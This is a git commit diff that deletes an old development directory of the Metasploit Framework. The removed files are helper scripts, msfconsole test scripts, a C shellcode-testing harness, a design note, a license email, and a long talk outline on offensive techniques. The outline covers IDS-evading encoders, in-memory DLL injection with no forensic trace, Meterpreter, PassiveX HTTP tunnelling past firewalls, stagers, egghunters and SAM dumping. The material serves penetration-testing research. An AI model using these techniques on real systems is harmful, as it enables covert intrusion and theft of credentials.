Nuke the old/obsolete dev directory
git-svn-id: file:///home/svn/framework3/trunk@5960 4d416f70-5f16-0410-b530-b9f4589650da
|
@ -1,32 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
banner =
|
||||
%q{##
|
||||
# $Id:$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
}
|
||||
|
||||
mod = ARGV.shift
|
||||
data = File.read(mod)
|
||||
|
||||
if (data =~ /This file is part of the Metasploit/) {
|
||||
exit(0)
|
||||
}
|
||||
|
||||
|
||||
fd = File.open(mod, 'w')
|
||||
fd.write(banner)
|
||||
fd.write(data)
|
||||
fd.close
|
||||
|
||||
system("svn propset svn:keywords 'Rev Revision Id Header' #{mod}")
|
||||
|
||||
|
|
@ -1,39 +0,0 @@
|
|||
#/usr/bin/perl
|
||||
use strict;
|
||||
|
||||
die if @ARGV != 1;
|
||||
|
||||
move($ARGV[0]);
|
||||
|
||||
sub old_to_new {
|
||||
my $name = shift;
|
||||
|
||||
$name =~ s/^([A-Z])/lc($1)/ge;
|
||||
$name =~ s/([A-Z])/"_" . lc($1)/ge;
|
||||
|
||||
return($name);
|
||||
}
|
||||
|
||||
sub move {
|
||||
my $dir = shift;
|
||||
my @entries;
|
||||
|
||||
opendir(DIR, $dir) || die "Can't open $dir: $!\n";
|
||||
@entries = readdir(DIR);
|
||||
closedir(DIR);
|
||||
|
||||
foreach my $entry (@entries) {
|
||||
next if($entry eq 'Attic' || $entry =~ /^\./);
|
||||
|
||||
my $path = $dir . '/' . $entry;
|
||||
my $newpath = $dir . '/' . old_to_new($entry);
|
||||
|
||||
if(-d $path) {
|
||||
move($path);
|
||||
}
|
||||
|
||||
print "$path -> $newpath\n";
|
||||
rename($path, $newpath) || die("BAH!");
|
||||
|
||||
}
|
||||
}
|
|
@ -1,27 +0,0 @@
|
|||
#!/usr/bin/perl -pi
|
||||
use strict;
|
||||
|
||||
s/require '(.*?)'/"require '" . waka($1) . "'"/ge;
|
||||
|
||||
sub waka {
|
||||
my $required = shift;
|
||||
|
||||
my @pieces = split('/', $required);
|
||||
map { $_ = old_to_new($_) } @pieces;
|
||||
my $new = join('/', @pieces);
|
||||
|
||||
return $new;
|
||||
}
|
||||
|
||||
sub old_to_new {
|
||||
my $name = shift;
|
||||
|
||||
if(uc($name) eq $name) {
|
||||
return(lc($name));
|
||||
}
|
||||
|
||||
$name =~ s/^([A-Z])/lc($1)/ge;
|
||||
$name =~ s/([A-Z])/"_" . lc($1)/ge;
|
||||
|
||||
return($name);
|
||||
}
|
|
@ -1,48 +0,0 @@
|
|||
Auxiliary Module Design
|
||||
-----------------------
|
||||
|
||||
The goal of this document is to define the requirements and basic
|
||||
implementation of Metasploit v3.0 Auxiliary Modules. Auxiliary modules have a
|
||||
unique role in the Framework in that they can do just about anything.
|
||||
Auxiliary modules work similar to exploits, in that the user selects a module,
|
||||
configures, and launches it, but differs in that they do not execute arbitrary
|
||||
code on target systems.
|
||||
|
||||
|
||||
Design Goals
|
||||
------------
|
||||
|
||||
Auxiliary modules should be capable of performing reconnaisance activities,
|
||||
such as sending probes or listening to the network, and exporting the data
|
||||
into a persistent storage system accessible to the rest of the Framework. Not
|
||||
all auxiliary modules produce this type of data, some may perform intrusive
|
||||
actions, such as file retrieval or modifying access credentials.
|
||||
|
||||
An Auxiliary module has the ability to define new commands and then process
|
||||
these commands. Any user interface that sypports Auxiliary modules needs to
|
||||
take into account this fact and allow these optional commands to be accessed.
|
||||
|
||||
Unlike exploits, auxiliary modules do not use Targets, instead they support
|
||||
what we call Actions. An Action is an option, that when set, causes the
|
||||
auxiliary module to perform a selected task. Between the extensible command
|
||||
set and the Actions system, a single auxiliary module is capable performing an
|
||||
almost infinite number of tasks.
|
||||
|
||||
An example would be a module that performs various tasks against a Microsoft
|
||||
SQL Server. This module would only support the default command of 'run', but
|
||||
could allow the user to send a UDP probe and display the data, perform an
|
||||
account brute force, or scan all open ports for an exposed MSSQL DCERPC
|
||||
interface.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Storage
|
||||
-------
|
||||
|
||||
|
||||
|
||||
|
||||
Requirements
|
||||
------------
|
|
@ -1,75 +0,0 @@
|
|||
From nolimit.bugtraq@gmail.com Sun Jan 22 16:40:09 2006
|
||||
From nolimit.bugtraq@gmail.com Sun Jan 22 22:39:35 2006
|
||||
Return-Path: <nolimit.bugtraq@gmail.com>
|
||||
X-Spam-Checker-Version: SpamAssassin 3.1.0-gr0 (2005-09-13) on sugar.14x.net
|
||||
X-Spam-Level:
|
||||
X-Spam-Status: No, score=-2.1 required=5.0 tests=BAYES_00,HTML_40_50,
|
||||
HTML_MESSAGE autolearn=ham version=3.1.0-gr0
|
||||
Delivered-To: hdm-hdm@metasploit.com
|
||||
Received: (qmail 8349 invoked from network); 22 Jan 2006 16:39:35 -0600
|
||||
Received: from unknown (HELO uproxy.gmail.com) (66.249.92.203)
|
||||
by sugar.14x.net with SMTP; 22 Jan 2006 16:39:35 -0600
|
||||
Received: by uproxy.gmail.com with SMTP id j3so504335ugf
|
||||
for <hdm@metasploit.com>; Sun, 22 Jan 2006 14:40:09 -0800 (PST)
|
||||
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
|
||||
s=beta; d=gmail.com;
|
||||
h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references;
|
||||
b=FBG7YV3XXWeZisoQR5v8dxhWbwA/m0bXqv9oL5+jChFGrjP4k1cR2k8HdCygCpy1yJQoMLwlbPNVtdUkYMAoFg+fTTRDbZiiM8XQtidhcaM41Hbep60wkSBX8UemqRSLFaX0fRqiNDkHrAyEkVZOedxEwEzy+YYDFeqEiGVWib8=
|
||||
Received: by 10.66.219.19 with SMTP id r19mr1989749ugg;
|
||||
Sun, 22 Jan 2006 14:40:09 -0800 (PST)
|
||||
Received: by 10.66.255.7 with HTTP; Sun, 22 Jan 2006 14:40:08 -0800 (PST)
|
||||
Message-ID: <786b40bf0601221440x27049938h4c4fd527c23b930c@mail.gmail.com>
|
||||
Date: Sun, 22 Jan 2006 17:40:09 -0500
|
||||
From: nolimit bugtraq <nolimit.bugtraq@gmail.com>
|
||||
To: H D Moore <hdm@metasploit.com>
|
||||
Subject: Re: Metasploit Framework License
|
||||
In-Reply-To: <200601221520.34147.hdm@metasploit.com>
|
||||
MIME-Version: 1.0
|
||||
Content-Type: multipart/alternative;
|
||||
boundary="----=_Part_10104_11843058.1137969609003"
|
||||
References: <200601221520.34147.hdm@metasploit.com>
|
||||
Status: R
|
||||
X-Status: NC
|
||||
X-KMail-EncryptionState:
|
||||
X-KMail-SignatureState:
|
||||
X-KMail-MDN-Sent:
|
||||
|
||||
------=_Part_10104_11843058.1137969609003
|
||||
Content-Type: text/plain; charset=ISO-8859-1
|
||||
Content-Transfer-Encoding: quoted-printable
|
||||
Content-Disposition: inline
|
||||
|
||||
I give you full rights to use any exploits I've published in the metasploit
|
||||
framework, and continue to be honored by it.
|
||||
|
||||
On 1/22/06, H D Moore <hdm@metasploit.com> wrote:
|
||||
>
|
||||
> Hello,
|
||||
>
|
||||
> I you are receiving this email, there is a good chance that you
|
||||
> contributed to the Metasploit Framework sometime in the past.
|
||||
> Starting with version 3.0, we are changing the licensing terms.
|
||||
> <CUT>
|
||||
>
|
||||
|
||||
------=_Part_10104_11843058.1137969609003
|
||||
Content-Type: text/html; charset=ISO-8859-1
|
||||
Content-Transfer-Encoding: quoted-printable
|
||||
Content-Disposition: inline
|
||||
|
||||
I give you full rights to use any exploits I've published in the metasploit=
|
||||
framework, and continue to be honored by it. <br><br>
|
||||
<div><span class=3D"gmail_quote">On 1/22/06, <b class=3D"gmail_sendername">=
|
||||
H D Moore</b> <<a href=3D"mailto:hdm@metasploit.com">hdm@metasploit.com<=
|
||||
/a>> wrote:</span>
|
||||
<blockquote class=3D"gmail_quote" style=3D"PADDING-LEFT: 1ex; MARGIN: 0px 0=
|
||||
px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">Hello,<br><br>I you are receivin=
|
||||
g this email, there is a good chance that you<br>contributed to the Metaspl=
|
||||
oit Framework sometime in the past.
|
||||
<br>Starting with version 3.0, we are changing the licensing terms.<br><=
|
||||
CUT><br></blockquote></div>
|
||||
|
||||
------=_Part_10104_11843058.1137969609003--
|
||||
|
||||
|
||||
|
|
@ -1,55 +0,0 @@
|
|||
#!/usr/local/bin/ruby
|
||||
|
||||
if ARGV.empty?
|
||||
puts "usage: <delta value | t> <files ...>"
|
||||
exit(1)
|
||||
end
|
||||
|
||||
textmode = false
|
||||
|
||||
if ARGV[0] == 't'
|
||||
ARGV.shift
|
||||
textmode = true
|
||||
else
|
||||
delta = ARGV.shift.to_i
|
||||
end
|
||||
|
||||
first = TRUE
|
||||
last = [ ]
|
||||
|
||||
# simple algorithm, build up a list of all the possible addresses
|
||||
# calculating the delta range for each address in the file... then
|
||||
# just do a set intersection across these all and you have your results
|
||||
|
||||
ARGV.each do |file|
|
||||
cur = [ ]
|
||||
IO.foreach(file) do |line|
|
||||
if textmode
|
||||
cur << line
|
||||
else
|
||||
addr = line.hex
|
||||
(-delta .. delta).each do |d|
|
||||
cur << addr + d
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
if first
|
||||
first = FALSE
|
||||
last = cur
|
||||
else
|
||||
last = last & cur
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
# print da results
|
||||
|
||||
last.each { |l|
|
||||
if textmode
|
||||
puts l
|
||||
else
|
||||
puts "0x%08x" % l
|
||||
end
|
||||
}
|
||||
|
|
@ -1,2 +0,0 @@
|
|||
load db_postgres
|
||||
exit
|
|
@ -1,7 +0,0 @@
|
|||
load db_sqlite3
|
||||
db_create
|
||||
db_import_nessus_nbe /home/hdm/local.nbe
|
||||
db_hosts
|
||||
db_vulns
|
||||
db_destroy
|
||||
db_hosts
|
|
@ -1,19 +0,0 @@
|
|||
load db_sqlite3
|
||||
use aux/recon
|
||||
set RHOST 127.0.0.1
|
||||
set ACTION Probe All Ports
|
||||
run
|
||||
sleep 1
|
||||
db_services
|
||||
sleep 1
|
||||
db_services
|
||||
sleep 1
|
||||
db_services
|
||||
sleep 1
|
||||
db_services
|
||||
sleep 1
|
||||
db_services
|
||||
sleep 1
|
||||
db_services
|
||||
sleep 1
|
||||
db_services
|
Before Width: | Height: | Size: 10 KiB |
Before Width: | Height: | Size: 5.3 KiB |
Before Width: | Height: | Size: 52 KiB |
|
@ -1,11 +0,0 @@
|
|||
OPTS="-x .ut.rb -x .ts.rb -q"
|
||||
BASE="documentation/api"
|
||||
|
||||
echo "Generating rex..."
|
||||
rdoc $OPTS -t "Rex Documentation" -o $BASE/rex lib/rex
|
||||
echo "Generating msfcore"
|
||||
rdoc $OPTS -t "Framework Core Documentation" -o $BASE/msfcore lib/msf/core
|
||||
echo "Generating msfbase"
|
||||
rdoc $OPTS -t "Framework Base Documentation" -o $BASE/msfbase lib/msf/base
|
||||
echo "Generating msfui"
|
||||
rdoc $OPTS -t "Framework UI Documentation" -o $BASE/msfui lib/msf/ui
|
|
@ -1,2 +0,0 @@
|
|||
require 'mkmf'
|
||||
create_makefile('machinetestinternal')
|
|
@ -1,12 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
require 'machinetestinternal'
|
||||
|
||||
module MachineTest
|
||||
def MachineTest.test(str, all = false)
|
||||
MachineTest::Internal.test(str + "\xcc", all)
|
||||
end
|
||||
def MachineTest.testraw(str, all = false)
|
||||
MachineTest::Internal.test(str, all)
|
||||
end
|
||||
end
|
|
@ -1,67 +0,0 @@
|
|||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/mman.h>
|
||||
#include <errno.h>
|
||||
|
||||
#include <ruby.h>
|
||||
#include <signal.h>
|
||||
#define PAGE_SIZE 0x1000
|
||||
|
||||
static VALUE t_test(VALUE self, VALUE str, VALUE all) {
|
||||
int len = 1, pid, status, i;
|
||||
char *ptr, *start, *stop;
|
||||
|
||||
str = StringValue(str);
|
||||
|
||||
/* test all of the string, instead of just from the beginning */
|
||||
if(all == Qtrue)
|
||||
len = RSTRING(str)->len;
|
||||
|
||||
while(len-- > 0) {
|
||||
switch(fork()) {
|
||||
case -1:
|
||||
perror("fork");
|
||||
rb_raise(rb_eRuntimeError, "fork failed!");
|
||||
case 0:
|
||||
for(i = 0; i < 20; i++) {
|
||||
signal(i, SIG_DFL);
|
||||
}
|
||||
|
||||
ptr = RSTRING(str)->ptr + len;
|
||||
|
||||
start = (char *)((unsigned int)ptr & ~(PAGE_SIZE-1));
|
||||
stop = (char *)(((unsigned int)(ptr + (RSTRING(str)->len - len)) + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1));
|
||||
|
||||
__asm__ __volatile__(
|
||||
"mov %0, %%eax"
|
||||
:
|
||||
: "m"((long)ptr)
|
||||
: "%eax");
|
||||
|
||||
if ((i = mprotect(start, (int)(stop - start), PROT_EXEC|PROT_WRITE|PROT_READ)) != 0)
|
||||
printf("mprotect failed, %d %d\n", i, errno);
|
||||
|
||||
((void (*)(void)) RSTRING(str)->ptr + len)();
|
||||
exit(1);
|
||||
default:
|
||||
wait(&status);
|
||||
if(!WIFSIGNALED(status) || WTERMSIG(status) != 5) {
|
||||
return INT2NUM(len);
|
||||
}
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
return Qnil;
|
||||
}
|
||||
|
||||
void Init_machinetestinternal() {
|
||||
VALUE cTest;
|
||||
|
||||
cTest = rb_define_module_under(
|
||||
rb_define_module("MachineTest"),
|
||||
"Internal"
|
||||
);
|
||||
rb_define_module_function(cTest, "test", t_test, 2);
|
||||
}
|
|
@ -1,33 +0,0 @@
|
|||
|
||||
Blog entry, Stardate April, 2005
|
||||
|
||||
We have recently been on a new shellcode kick, but this time it's not about
|
||||
making them smaller. We're currently working on building very power new
|
||||
post-exploitation shellcode and toolkits, and a very powerful unified API
|
||||
to expose their functionality. This will allow us to diverge from precanned
|
||||
payloads, allowing users to quickly build power and portable post-exploitation
|
||||
tools. We've have built strongly upon our Windows DLL injection, and are
|
||||
working on extending similar functionality to the land of Unix. We're also
|
||||
working hard on the next version of Metasploit, which follows this same
|
||||
philosophy of emedability and extensablity, allowing users to build their own
|
||||
tools on top of our framework. Our previous work was all about exploit
|
||||
frameworks. Our new approach we are really building more of a hacker tool
|
||||
framework, allowing very strong automation and customization.
|
||||
|
||||
|
||||
|
||||
ignore this.....
|
||||
|
||||
With Metasploit 3.0 on the horizon, we've been working hard on design and
|
||||
building components to take a very different focus. Currently Metasploit 2
|
||||
is very much an end user tool, and doing anything custom isn't so elegant.
|
||||
The approach we are taking in Metasploit 3, is "Metasploit as a library". We
|
||||
are working very hard on writing post-exploitation suites for different
|
||||
platforms, and then building a unified API that they all adhere to. This will
|
||||
allow you to directly script remote hosts, proxying file operations, network
|
||||
communications, and transparent channelized communication. The new system is
|
||||
being designed to be threadsafe to a high degree, forcing us to rethink and
|
||||
redesign many of our tools and protocols. Our new system is design to allow
|
||||
you to do things like run 10 exploits concurrently, all "pivoting" through
|
||||
a host you previously owned. Along with this new feature set, we are still
|
||||
concentrating on keeping things off disk, all in-memory injection, etc.
|
|
@ -1,383 +0,0 @@
|
|||
[12:52:34] -> *spewnum* damn you! :) fine, we'll just call them payloads, and then we'll break it up as Payload Stagers, Payload Stages, and
|
||||
Post-exploitation suites, does that sound coo?
|
||||
|
||||
I. Introduction
|
||||
A. Who are we?
|
||||
1. spoonm
|
||||
2. skape
|
||||
3. Why do we do this hoodoo voodoo
|
||||
B. Exploit Technology
|
||||
1. Three Phases of Exploitation
|
||||
a. Pre-exploitation
|
||||
b. Exploitation
|
||||
c. Post-exploitation
|
||||
2. Pre-exploitation - Before the attack
|
||||
a. Find the bug
|
||||
b. Write exploits, payloads, tools
|
||||
3. Exploitation - Leveraging the vulnerability
|
||||
a. Find a target
|
||||
c. Gather info, setup tools, prepare listeners, etc
|
||||
b. Launch attack
|
||||
4. Post-Exploitation - Manipulating the target
|
||||
a. Command shell redirection
|
||||
b. Arbitrary command execution
|
||||
c. Pivoting payloads
|
||||
d. Advanced payload interaction
|
||||
B. Where do we stand?
|
||||
1. Pre-exploitation
|
||||
a. Robust and elegant encoders do exist
|
||||
i. SkyLined's alpha-numeric encoder
|
||||
ii. Spoonm's Shikata Ga Nai
|
||||
b. Payload encoders generally taken for granted
|
||||
NOTE: maybe expand a little bit more here...
|
||||
i. Most encoders are static with a variable key
|
||||
ii. IDS able to signature static decoder stubs
|
||||
c. NOP generation hasn't publically changed much
|
||||
i. PoC exploits generally use predictable nops, if any
|
||||
ii. ADMmutate easily signatured by most NIDS (Snort, Fnord)
|
||||
iii. Not considered very important to many researchers
|
||||
d. NIDS deployments are playing chase the tail
|
||||
i. The mouse always has the advantage; NIDS is reactive
|
||||
ii. Advanced nops and encoders push NIDS to its limits
|
||||
NOTE: maybe talk about how complex some things are to signature,
|
||||
for example, RPC, application level fragmentation, etc.
|
||||
2. Exploitation
|
||||
a. Techniques have become very mature
|
||||
i. Linux/BSD exploitation techniques largely unchanged
|
||||
ii. Win32 heap overflows now more reliable (oded/shok)
|
||||
iii. Win32 SEH overwrites make exploitation easy, even on XPSP2
|
||||
b. Exploitation topics have been beaten to death
|
||||
3. Post-exploitation
|
||||
a. Common payloads are limited
|
||||
i. Command shell interaction has poor automation support
|
||||
ii. Limited to the command set that the interpreter provides
|
||||
iii. Bounded by the utilities installed on the target machine
|
||||
iv. Restrictive environments (chroot) can hinder command execution
|
||||
v. HIPS vendors becoming more adept at detecting basic payloads
|
||||
- LoadLibraryA from the stack, etc (mcafee 8.0i)
|
||||
NOTE: I think it would be important here to talk even about the
|
||||
issues with "advantage" payloads, ala Core Impact and CANVAS.
|
||||
We should look into them more, but I have a hunch that they
|
||||
aren't that well writte, don't have that great of APIs
|
||||
exposed, and aren't very extensible for a 3rd party not
|
||||
on the team authoring the product. Even the "advanced" stuff
|
||||
I think has a lot of issues.
|
||||
b. Communication vectors largely unchanged
|
||||
i. Reverse and port-bind payloads still the most common
|
||||
ii. Findsock style payloads still unused by PoC exploits
|
||||
iii. Alternative communication vectors rarely discussed
|
||||
c. Pivoting technology exists
|
||||
i. Core ST described system call proxying in 2002
|
||||
ii. Metasploit's (2.3) meterpreter provides basic network pivoting
|
||||
C. What will we discuss?
|
||||
1. Pre-exploitation Research
|
||||
a. NOP generation
|
||||
i. Opty2
|
||||
b. Encoders
|
||||
i. Additive feedback encoders
|
||||
ii. Shikata Ga Nai
|
||||
2. Post-Exploitation Research
|
||||
a. Library Injection
|
||||
i. Facilitates things like Meterpreter and VNC injection
|
||||
b. VNC Injection
|
||||
i. Introduced at blackhat04 with the Metasploit 2.2 release
|
||||
c. Meterpreter & dN
|
||||
i. The cross-platform post-exploitation suite
|
||||
NOTE: dN is weak, but maybe talk about it from a different perspective,
|
||||
just about allowing the attacker to really orcistrate everything
|
||||
down even to the system call level. Definitely should talk a
|
||||
bunch about your ninjaness with meterp TLV stylies, and the
|
||||
channelized throwdown. (</thuggin>).
|
||||
3. Payload Research
|
||||
a. PassiveX
|
||||
i. Taking advantage of ActiveX controls
|
||||
ii. Taking advantage of soccer playing sisters.
|
||||
b. Ordinal Stagers
|
||||
i. Tiny network capable stagers
|
||||
c. Egghunt (maybe?)
|
||||
i. Small payload capable of locating a larger payload
|
||||
ii. Useful for exploits with limited space
|
||||
NOTE: Egghunt is cool, and we can just talk a bit about how we
|
||||
extracted the syscalls, and how all of our tools come together
|
||||
to do stuff like that really fast/easily. Oded mentioned he
|
||||
saw the page and thought it was cool, he wondered how you
|
||||
got the prototypes...
|
||||
II. Pre-exploitation
|
||||
A. OptyNop2
|
||||
1. Creation and benefits of multi-byte nopsleds
|
||||
B. Additive feedback encoders
|
||||
C. Shikata Ga Nai
|
||||
1. High permutation shellcode through simple dependency mappings
|
||||
III. Post-exploitation
|
||||
A. Library Injection
|
||||
1. Overview
|
||||
a. Paper published in 04/2004
|
||||
b. Provides advanced code execution
|
||||
c. Code can be written in any language that can compile down
|
||||
to a shared object.
|
||||
d. Allows developer to use all of the APIs exposed to a normal
|
||||
application.
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include lib inject paper)
|
||||
2. Two types of library injection
|
||||
a. On-Disk
|
||||
i. Library is loaded from the target's harddrive or via a
|
||||
file share.
|
||||
ii. Can be detected by AV products due to fs access
|
||||
b. In-Memory
|
||||
i. Library is uploaded to the target and loaded from memory
|
||||
without touching the disk
|
||||
ii. Evades file system filter drivers, such as those
|
||||
provided by AV companies
|
||||
iii. Not touching the disk means no forensic trace
|
||||
iv. VirtualLock prevents swapping to disk, but requires admin
|
||||
3. In-memory library injection on Windows
|
||||
a. System calls used by the library loader are hooked
|
||||
i. NtCreateFile
|
||||
ii. NtMapViewOfSection
|
||||
iii. etc
|
||||
b. Unique image name is used to identify the image to image that
|
||||
is in memory
|
||||
c. System call hooks are removed so that future injectino can
|
||||
occur
|
||||
d. Alternative approaches
|
||||
i. Could do client-side relocations, but would need to handle
|
||||
import processing
|
||||
4. In-memory library injection on Linux/BSD
|
||||
a. No known public implementations
|
||||
b. Requires alternate approach
|
||||
i. Hooking API routines not always possible -- symtab not
|
||||
mapped into memory
|
||||
ii. libc symbol version mismatches lead to linking nightmares
|
||||
c. Client-side relocations seem most feasible
|
||||
i. Remote side maps a region of memory and sends the client
|
||||
the base address
|
||||
ii. Client processes relocations and transmits the relocated
|
||||
image as its mapped segment would appear
|
||||
iii. Requires locating rtld base so that PLT lookups will
|
||||
work
|
||||
B. VNC Injection
|
||||
1. Implements VNC as an injectable DLL
|
||||
a. Uses RealVNC as the code-base
|
||||
b. VNC communication uses the exploit connection
|
||||
c. No physical trace is left of the VNC server
|
||||
d. Can operate regardless of existing VNC installations
|
||||
2. Easy way to illustrate insecurities
|
||||
a. Suits understand mouse movement better than black box command
|
||||
prompts
|
||||
C. Meterpreter
|
||||
1. Generic post-exploitation suite
|
||||
a. Based on library injection
|
||||
b. Uses the established exploit connection
|
||||
i. Especially powerful with findsock payloads; no new connection
|
||||
c. Executes entirely from memory
|
||||
d. No new processes or file access required for the payload to
|
||||
succeed
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include meterpreter paper)
|
||||
2. Extension system provides advanced automation support
|
||||
a. No need to hand write tedious assembly
|
||||
b. Existing native code can be ported to a meterpreter extension
|
||||
3. Architecture
|
||||
a. Design goals
|
||||
i. Very flexible protocol; should adapt to extension requirements
|
||||
ii. Exposure of a channelized communication system to extensions
|
||||
iii. Stealth operation
|
||||
iv. Should be portable to various operating systems
|
||||
v. Client from one platform should work with server on another
|
||||
platform
|
||||
b. Protocol
|
||||
i. Uses TLVs (Type-Length-Value) to support arbitrary data
|
||||
passing.
|
||||
ii. TLVs allow the packet parser to be oblivious to the structure
|
||||
of the value field
|
||||
iii. Type field is broken down into meta types
|
||||
4. Core interface
|
||||
a. Overview
|
||||
i. Minimal interface to support the loading of extensions
|
||||
ii. Implements the basic packet transmission and dispatching
|
||||
facilities
|
||||
iii. Exposes channel allocation and management to extensions
|
||||
b. Advanced features
|
||||
i. Migrating the server instance between processes
|
||||
5. The ``stdapi'' extension
|
||||
a. Overview
|
||||
i. Included in Metasploit 3.0
|
||||
ii. Provides access to some of the common subsystems of the
|
||||
target operating system
|
||||
iii. Allows for easy automation and implementation of robust
|
||||
post-exploitation scripts
|
||||
b. File System
|
||||
i. File and directory interaction
|
||||
ii. Files can be uploaded and downloaded between the
|
||||
attacker and the target
|
||||
c. Network
|
||||
i. Transparent network pivoting
|
||||
ii. Route table enumeration and manipulation
|
||||
iii. Local interface enumeration
|
||||
d. Process
|
||||
i. Process execution, optionally with channelized IO
|
||||
ii. Enumeration of running processes
|
||||
iii. Modification of arbitrary memory
|
||||
iv. Creation and modification of running threads
|
||||
v. Loading and interacting with shared object files
|
||||
e. Registry
|
||||
i. General registry API access
|
||||
ii. Opening, creating, and removing registry keys
|
||||
iii. Setting, querying, and deleting registry values
|
||||
iv. Enumeration of both keys and values
|
||||
f. User interface
|
||||
i. Disabling local user interaction via the keyboard
|
||||
and/or mouse (similar to VNC)
|
||||
ii. Idle timeout checking to see how long it's been
|
||||
since the user did something interactive
|
||||
6. The ``priv'' extension
|
||||
a. Still in development
|
||||
b. Exposes an interface to escalating local privileges
|
||||
through local vulnerabilities
|
||||
c. SAM dumping support similar to pwdump3
|
||||
D. dN
|
||||
1. Simple low-footprint post-exploitation tool
|
||||
2. Useful to scope out execution enviroment, then bootstrap other tools
|
||||
IV. Payload Research
|
||||
A. PassiveX
|
||||
1. Overview
|
||||
a. Post-exploitation payload
|
||||
b. A derivative of On-Disk library injection that uses
|
||||
ActiveX controls
|
||||
c. Supports arbitrary DLL injection in any language that can
|
||||
be compiled as an ActiveX control (C++, VB, etc)
|
||||
d. Detailed analysis can be found in included resources
|
||||
(include passivex paper)
|
||||
2. Payload Implementation
|
||||
a. Disables iexplore Internet zone restrictions on
|
||||
ActiveX controls
|
||||
i. Modifies four registry values that are stored per-user
|
||||
b. Launches a hidden iexplore at a URL with an embedded
|
||||
OCX
|
||||
i. The OCX does not have to be signed
|
||||
ii. No user interaction is required
|
||||
iii. OCX is automatically downloaded, registered, and loaded
|
||||
into the browser's context
|
||||
3. Sample HTTP tunneling ActiveX control
|
||||
a. HTTP GET/POST used to build tunnel to attacker
|
||||
i. Uses the WININET API
|
||||
ii. Outbound traffic from target machine encapsulated in POST
|
||||
request
|
||||
iii. Inbound traffic from attacker encapsulated in GET response
|
||||
iv. Proxy configuration automatically inherited
|
||||
v. Requires HTTP server capable of performing encap/decap on the
|
||||
HTTP packets
|
||||
b. Streaming connection through HTTP tunnel can be created
|
||||
i. socketpair doesn't exist natively on win32 but can be simulated
|
||||
with a local listener
|
||||
ii. Streaming abstraction allows advanced payloads to transparently
|
||||
use the HTTP transport (Meterpreter, VNC)
|
||||
iii. Local listener less covert, but highly beneficial
|
||||
4. Pros
|
||||
a. Bypasses restrictive outbound filters
|
||||
b. Re-uses proxy configuration
|
||||
c. Looks like normal user traffic
|
||||
d. Allows full access to the win32 API like all forms of
|
||||
library injection
|
||||
5. Cons
|
||||
a. Touches the disk
|
||||
b. Requires administrative access
|
||||
i. Internet Explorer prohibits the downloading of
|
||||
ActiveX controls as non-admin
|
||||
B. Windows Ordinal Stagers
|
||||
1. Overview
|
||||
a. Technique from Oded's lightning talk from core04
|
||||
b. Uses static ordinals to locate winsock symbol addresses
|
||||
c. Compatible with all versions of Windows
|
||||
d. 92 byte reverse stager, 93 byte findsock stager
|
||||
e. Detailed explanation can be found in included resources
|
||||
(include spoonm ordinal paper)
|
||||
2. Reverse Ordinal Stager
|
||||
a. Walks InitOrderModuleList searching for ws2_32
|
||||
b. Uses static ordinals to index the export table
|
||||
c. Creates fd with socket
|
||||
d. Chains connect and recv frames
|
||||
e. Returns into buffer read in from file descriptor
|
||||
C. Egghunting
|
||||
1. Overview
|
||||
a. Small stub payload that can search for a larger payload
|
||||
b. Useful for exploits that have limited payload space but can
|
||||
stash more payload elsewhere in memory
|
||||
c. Example exploits include the IE object type vulnerability.
|
||||
d. Goal is to safely search target address space for the larger
|
||||
payload.
|
||||
e. Larger payload is located by searching for an egg that is prepended
|
||||
to it.
|
||||
f. Detailed analysis can be found in included resources
|
||||
(include egghunt paper)
|
||||
2. Two primary methods of egghunting on Windows
|
||||
a. SEH
|
||||
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
|
||||
versions of Windows (including 9x)
|
||||
2. Installs a custom exception handler
|
||||
3. Begins walking the address space
|
||||
i. When a bad address is encounter, the current pointer is
|
||||
incremented by PAGE_SIZE
|
||||
ii. When a mismatch of the egg is encountered, the current pointer
|
||||
is incremented by one
|
||||
4. Each address is compared against the 8-byte egg
|
||||
i. Bad addresses will throw exceptions which will be handled
|
||||
by the custom exception handler
|
||||
5. When the egg is found, jump past the egg into the larger payload
|
||||
b. System call
|
||||
1. Very small stub (32 bytes), searches for an 8 byte egg, only
|
||||
compatible with NT+
|
||||
2. Uses a non-intrusive system call (NtDisplayString) to search validate
|
||||
addresses
|
||||
i. Same page walking logic as SEH is used
|
||||
3. When the egg is found, jump past the egg into the larger payload
|
||||
3. One primary method of egghunting on Linux
|
||||
a. System call
|
||||
1. 30 bytes in size, searches for an 8 byte egg
|
||||
2. System call technique applies to other UNIX variants as well
|
||||
3. Uses the sigaction system call to validate 16 bytes at once
|
||||
4. Pros
|
||||
i. Very small
|
||||
5. Cons
|
||||
i. Corner cases may cause it to be unstable
|
||||
V. The Complete Picture - Metasploit 3.0
|
||||
A. The power of pre-exploitation prepartion
|
||||
1. Abstract NOP generation
|
||||
2. Abstract payload encoding
|
||||
3. Abstract exploit connection handlers
|
||||
i. Bind handler
|
||||
ii. Reverse handler
|
||||
iii. Findsock handler
|
||||
B. The power of exploit generalization
|
||||
1. Standardized exploit creation interface
|
||||
i. Robust target definitions
|
||||
ii. Detailed exploit implementation information
|
||||
iii. Entirely payload independent, no hardcoding paylaods
|
||||
C. The power of post-exploitation automation
|
||||
1. Complicated tasks made simple with scripting
|
||||
i. Want to download a targets entire harddrive?
|
||||
ii. Want to disable local user interaction?
|
||||
iii. Want to upload and play an mp3 on the target?
|
||||
iv. Want to 'be' on the target's network?
|
||||
2. Standard interface means cross platform support
|
||||
VI. Conclusion - where do we go from here?
|
||||
A. Future Post-exploitation research
|
||||
1. Mesh network support
|
||||
2. Expansion of the stdapi described in this document
|
||||
|
||||
included resources:
|
